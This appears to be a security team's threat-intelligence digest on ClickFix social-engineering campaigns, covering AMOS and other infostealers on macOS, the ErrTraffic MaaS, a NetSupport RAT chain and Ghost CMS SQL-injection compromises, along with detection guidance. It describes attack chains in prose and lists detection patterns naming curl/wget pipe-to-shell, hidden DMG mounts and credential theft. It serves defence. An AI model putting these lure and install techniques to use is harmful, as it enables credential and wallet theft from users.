macOS ClickFix uses hdiutil -nobrowse to mount DMG invisibly, drops AMOS

A new macOS ClickFix variant (Palo Alto Unit 42, via BleepingComputer 2026-06-23) drops the visible-DMG step: the fake-CAPTCHA Terminal lure now has the user paste a curl command that uses hdiutil attach -nobrowse to mount the disk image without it appearing in Finder or on the desktop, then launches a self-signed app via open (BleepingComputer, 2026-06-23). The payload is Atomic macOS Stealer (AMOS): it presents a fake System Preferences authentication prompt to capture the local password, then steals browser credentials across numerous Chromium- and Firefox-derived browsers, cryptocurrency-wallet data, and Keychain contents. [SINGLE-SOURCE] — BleepingComputer attributes to Unit 42 but a separate primary Unit 42 article for this specific technique was not located this run (see § 7). Detection on macOS: hdiutil attach -nobrowse invoked by a shell parented by Terminal; Terminal executing pasted commands referencing external download URLs; apps launched from /Volumes/ mounts; user awareness that legitimate CAPTCHAs never require Terminal input (T1204.001, T1105, T1555).

A second cross-day research thread: the ClickFix technique — fake browser/update dialogues that trick users into pasting attacker PowerShell — has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection (clipboard-sourced powershell.exe/mshta.exe invocations, RunMRU artefacts) is worth promoting from awareness training to a standing hunt.

ClickFix — fake browser/update dialogues that trick users into pasting attacker PowerShell — is maturing into a productised delivery channel, as this and the next item show. Sekoia's TDR team analysed ErrTraffic, a ClickFix distribution framework sold as MaaS by an actor using the handle "LenAI" on the Exploit.IN forum since at least December 2025 (Sekoia TDR, 2026-06-16). Affiliates compromise WordPress sites by credential-stuffing wp-login.php (one victim saw seven residential IPs in an 80-second window) or via WP File Manager CVE-2020-25213, then deploy a PHP backdoor as a must-use plugin (session-manager.php) that injects the ErrTraffic JavaScript. The JavaScript uses the EtherHiding technique — querying Polygon smart contracts via public RPC endpoints — to resolve C2 domains dynamically, defeating takedowns; it then serves ClickFix lures that drop Vidar, Stealc, SmokeLoader and others. ErrTraffic explicitly targets European and APAC visitors, putting public-sector WordPress portals in scope.

Why it matters to us: A reliable hunt artefact is the distinctive PowerShell comment block <# Code Verification: NNNNNNNNNNNN #> Sekoia found at the start of ErrTraffic command strings. Also watch for new PHP files under wp-content/mu-plugins/ (auto-loaded, no activation needed), credential-stuffing bursts on wp-login.php, and outbound requests from the web-server process to blockchain RPC endpoints.

SANS ISC handler Brad Duncan published a same-day forensic diary (2026-06-01) reconstructing an infection observed on 2026-05-27 that began with the SmartApeSG ClickFix campaign — fake browser-verification / "press Win+R" lures served from compromised pages — and ended in a full NetSupport Manager RAT deployment (SANS ISC, 2026-06-01). The ClickFix execution (T1204.001) drops a ZIP carrying an unnamed staging RAT that, per Duncan, has been beaconing a custom encoded — not TLS protocol over TCP/443 to its C2 since at least April 2026; that staging RAT then fetched the NetSupport payload as a ~17 MB Microsoft Cabinet (setup.cab). The install chain is processor.vbs (a 109-byte VBScript launcher in C:\ProgramData\, T1059.005) → token.bat (extracts the CAB into C:\ProgramData\UpdateInstaller\, sets persistence, then self-deletes all three dropper components, T1070.004) → NetSupport RAT C2 over port 443 (T1219 Remote Access Tools). Because NetSupport is legitimate commercial software, its presence and traffic blend with benign remote-support telemetry.

This is a single-source handler diary (HIGH-reliability source, single-day observation) and carries no independent corroboration of the identical chain in-window — treat the specifics as one analyst's forensic account. Detection concepts a SOC can apply without IOCs: browser process (chrome.exe/msedge.exe/firefox.exe) spawning wscript.exe/mshta.exe/cmd.exe (Sysmon EID 1 with browser parent-image); short-lived .vbs/.bat file-creates in C:\ProgramData\ (Sysmon EID 11); CAB expansion via expand.exe/wusa.exe from ProgramData; and registry Run-key persistence pointing at a non-standard NetSupport path (C:\ProgramData\UpdateInstaller\ rather than the legitimate C:\Program Files\NetSupport\). Where TLS inspection is in place, unencrypted payload on port 443 from a NetSupport process is anomalous.

XLab researchers at Qianxin documented an active, large-scale campaign weaponising the unauthenticated SQL-injection flaw CVE-2026-26980 against self-hosted Ghost CMS instances, with more than 700 compromised domains observed — among them university portals (Harvard, Oxford and Auburn are named), AI/SaaS companies, media outlets, fintech firms, security sites and personal blogs, plus DuckDuckGo (BleepingComputer, 2026-05-24; XLab Qianxin, 2026-05-21). The intrusion is a two-stage operation: the attacker first exploits the pre-auth SQLi in Ghost's Content API to read the admin API key out of the database, then uses that key — which carries full content-management scope — to inject a lightweight JavaScript loader into published articles. The loader pulls a second-stage cloaking script that fingerprints each visitor; those who qualify are served a fake Cloudflare "verify you are human" prompt in an iframe overlaid on the article (the ClickFix / FakeCaptcha pattern) instructing them to paste a supplied command into the Windows Run dialog, which drops DLL loaders, JavaScript droppers, or an Electron-based sample (UtilifySetup.exe) (BleepingComputer, 2026-05-24).

Why it matters to us: self-hosted Ghost is used across EU/CH universities, NGOs and independent media — exactly the named victim profile — and the campaign weaponises a flaw patched back in February (6.19.1) against the still-unpatched long tail. The threat is two-sided: site operators face server-side compromise and admin-key theft (rotate the key and audit posts/themes for injected <script> even after patching, per § 2 and § 5), while every visitor to a compromised site is a ClickFix target. The client-side execution chain is the higher-value, product-agnostic hunt — cmd.exe / powershell.exe spawned from a browser process tree following a Run-dialog paste — and is worth hunting regardless of whether you run Ghost (see § 5).

If you did nothing this week: self-hosted Ghost CMS instances are being mass-compromised through an unauthenticated blind SQL injection in the Content API slug filter, then weaponised as ClickFix social-engineering pages that serve infostealers to their own visitors.

XLab (Qianxin) and BleepingComputer document a large-scale campaign exploiting CVE-2026-26980 (CVSS 9.4, first covered 2026-05-25, GitHub advisory GHSA-w52v-v783-gw97). The dual-use is what makes this a §1 item rather than a routine SQLi: the same flaw both compromises the publishing platform and turns it into a watering hole. Public-sector, education and media organisations running self-hosted Ghost should patch to the fixed release and check for ClickFix-style injected content and unexpected database reads against the Content API.

Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users via fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes — Shub Stealer earlier wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell payload directly to bash, bypassing Gatekeeper because no signed application bundle is ever launched. Three distinct infostealers — Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer) — are delivered across campaign variants per Microsoft, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists with Telegram-fallback C2.

ATT&CK mapping: T1204.002 User Execution: Malicious File, T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert on Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile; LaunchAgent file-creation events from outside /Applications or /Library/Application Support/<vendor> paths; anomalous Keychain API calls from processes without UI entitlements (Endpoint Security framework ES_EVENT_TYPE_NOTIFY_OPENSSH-style hooks expose this on EDR-instrumented Macs).

Add detection for Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile, anomalous LaunchAgent / LaunchDaemon plist creation outside /Applications and /Library/Application Support/<vendor> paths, and Keychain-API access by processes without UI entitlements (Microsoft Security Blog, 2026-05-06). Brief end-users that Base64 Terminal-paste prompts on utility-installation pages are a malware delivery technique.